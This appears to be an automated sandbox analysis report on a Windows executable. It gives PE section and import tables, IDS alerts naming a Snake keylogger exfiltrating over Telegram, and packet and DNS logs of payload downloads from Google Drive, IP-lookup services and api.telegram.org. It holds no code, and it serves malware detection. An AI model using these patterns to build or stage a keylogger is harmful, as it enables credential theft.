                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  .text0x10000x637c0x640083ff228d6dae8dd738eb2f78afbc793fFalse0.672421875data6.491609540807675IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rdata0x80000x147c0x1600d9f9b0b330e238260616b62a7a3cac09False0.42933238636363635data4.973928345594701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  .data0xa0000x2aff80x6003f2b05c8fbb8b2e4c9c89e93d30e7252False0.53125data4.133631086111171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .ndata0x350000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                  .rsrc0x5d0000x11e00x120020639f4e7c421f5379e2fb9ea4a1530dFalse0.3684895833333333data4.485045860065118IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                  RT_BITMAP0x5d2680x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                                  RT_ICON0x5d5d00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                                                                  RT_DIALOG0x5d8b80x144dataEnglishUnited States0.5216049382716049
                                                                                                                                  RT_DIALOG0x5da000x13cdataEnglishUnited States0.5506329113924051
                                                                                                                                  RT_DIALOG0x5db400x100dataEnglishUnited States0.5234375
                                                                                                                                  RT_DIALOG0x5dc400x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                  RT_DIALOG0x5dd600xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                  RT_DIALOG0x5de280x60dataEnglishUnited States0.7291666666666666
                                                                                                                                  RT_GROUP_ICON0x5de880x14dataEnglishUnited States1.2
                                                                                                                                  RT_MANIFEST0x5dea00x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                                  DLLImport
                                                                                                                                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GlobalUnlock, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  EnglishUnited States
                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                  2024-12-15T18:29:45.858880+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449837216.58.208.238443TCP
                                                                                                                                  2024-12-15T18:29:53.504085+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449858193.122.130.080TCP
                                                                                                                                  2024-12-15T18:30:01.941772+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449858193.122.130.080TCP
                                                                                                                                  2024-12-15T18:30:06.300477+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.449885149.154.167.220443TCP
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 15, 2024 18:29:43.246592999 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:43.246627092 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:43.246717930 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:43.258887053 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:43.258903027 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:44.956856966 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:44.957113981 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:44.957518101 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:44.957587957 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:45.010179996 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:45.010262012 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:45.010489941 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:45.010653973 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:45.015379906 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:45.059425116 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:45.858688116 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:45.858886957 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:45.859203100 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:45.859289885 CET44349837216.58.208.238192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:45.859354019 CET49837443192.168.2.4216.58.208.238
                                                                                                                                  Dec 15, 2024 18:29:46.017631054 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:46.017723083 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:46.018052101 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:46.018202066 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:46.018249035 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:47.738897085 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:47.739166021 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:47.744045973 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:47.744121075 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:47.744488001 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:47.744570017 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:47.745100975 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:47.787369013 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.677480936 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.677656889 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.693622112 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.693732977 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.803107023 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.803277016 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.807271004 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.807745934 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.807843924 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.808306932 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.870893955 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.871140957 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.872668982 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.872911930 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.880515099 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.880839109 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.880903006 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.881156921 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.888127089 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.888324976 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.890333891 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.890680075 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.895018101 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.895363092 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.899430037 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.899637938 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.906997919 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.907223940 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.913183928 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.913647890 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.916961908 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.917212963 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.928625107 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.929337978 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.931337118 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.931467056 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.941303968 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.941478968 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.943759918 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.943844080 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.956219912 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.956696987 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.958699942 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.959064007 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.970688105 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.970890045 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.973357916 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.973424911 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.983442068 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.983525038 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.986363888 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.986557961 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.995263100 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.995414019 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:50.995476007 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:50.995556116 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.009665012 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.009727001 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.039673090 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.039752960 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.039787054 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.039861917 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.062442064 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.062542915 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.062558889 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.062621117 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.065052032 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.065262079 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.065275908 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.065335989 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.069097996 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.069169044 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.071804047 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.071885109 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.071897984 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.071959019 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.083683014 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.083753109 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.083801985 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.083861113 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.083874941 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.083937883 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.095047951 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.095160961 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.095175028 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.095231056 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.105298042 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.105372906 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.105525017 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.105581999 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.116703987 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.116765022 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.116779089 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.116931915 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.126113892 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.126333952 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.126348972 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.126427889 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.136126995 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.136471033 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.136534929 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.136868000 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.146986008 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.147305012 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.147403002 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.147603035 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.156241894 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.156511068 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.156645060 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.156877995 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.166491985 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.166598082 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.166676998 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.167155027 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.175906897 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.176068068 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.176084042 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.176147938 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.185483932 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.185581923 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.185647964 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.185754061 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.199872017 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.199985027 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.200016975 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.200073004 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.202759981 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.202846050 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.202886105 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.202965021 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.202977896 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.203059912 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.204051018 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.204143047 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.204268932 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.204308033 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.204333067 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.204350948 CET44349846172.217.17.65192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.204380035 CET49846443192.168.2.4172.217.17.65
                                                                                                                                  Dec 15, 2024 18:29:51.760657072 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:29:51.882474899 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.882699966 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:29:51.882936001 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:29:52.002624989 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:53.020834923 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:53.068552017 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:29:53.080347061 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:29:53.200185061 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:53.458142996 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:53.504085064 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:29:54.192825079 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:54.192908049 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:54.192981958 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:54.196424007 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:54.196465015 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.439449072 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.439595938 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:55.443269014 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:55.443300009 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.443701982 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.448642969 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:55.491453886 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.889712095 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.889796019 CET44349865104.21.67.152192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:55.889882088 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:29:55.932670116 CET49865443192.168.2.4104.21.67.152
                                                                                                                                  Dec 15, 2024 18:30:01.425071001 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:30:01.547382116 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:01.893702030 CET8049858193.122.130.0192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:01.941771984 CET4985880192.168.2.4193.122.130.0
                                                                                                                                  Dec 15, 2024 18:30:02.043170929 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:02.043226004 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:02.043304920 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:02.043874025 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:02.043903112 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:03.429035902 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:03.429136992 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:05.474471092 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:05.474545956 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:05.474931955 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:05.476660967 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:05.519345045 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:05.519459009 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  Dec 15, 2024 18:30:05.519470930 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:06.300527096 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:06.300618887 CET44349885149.154.167.220192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:06.300685883 CET49885443192.168.2.4149.154.167.220
                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Dec 15, 2024 18:29:43.099060059 CET5102953192.168.2.41.1.1.1
                                                                                                                                  Dec 15, 2024 18:29:43.236304045 CET53510291.1.1.1192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:45.878531933 CET5668253192.168.2.41.1.1.1
                                                                                                                                  Dec 15, 2024 18:29:46.016710043 CET53566821.1.1.1192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:51.611061096 CET6501453192.168.2.41.1.1.1
                                                                                                                                  Dec 15, 2024 18:29:51.755301952 CET53650141.1.1.1192.168.2.4
                                                                                                                                  Dec 15, 2024 18:29:53.740725994 CET6288953192.168.2.41.1.1.1
                                                                                                                                  Dec 15, 2024 18:29:54.191927910 CET53628891.1.1.1192.168.2.4
                                                                                                                                  Dec 15, 2024 18:30:01.900265932 CET5212153192.168.2.41.1.1.1
                                                                                                                                  Dec 15, 2024 18:30:02.042350054 CET53521211.1.1.1192.168.2.4
                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                  Dec 15, 2024 18:29:43.099060059 CET192.168.2.41.1.1.10x2e44Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:45.878531933 CET192.168.2.41.1.1.10x5fc5Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:51.611061096 CET192.168.2.41.1.1.10xbd8dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:29:53.740725994 CET192.168.2.41.1.1.10x3259Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                  Dec 15, 2024 18:30:01.900265932 CET192.168.2.41.1.1.10xca3cStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
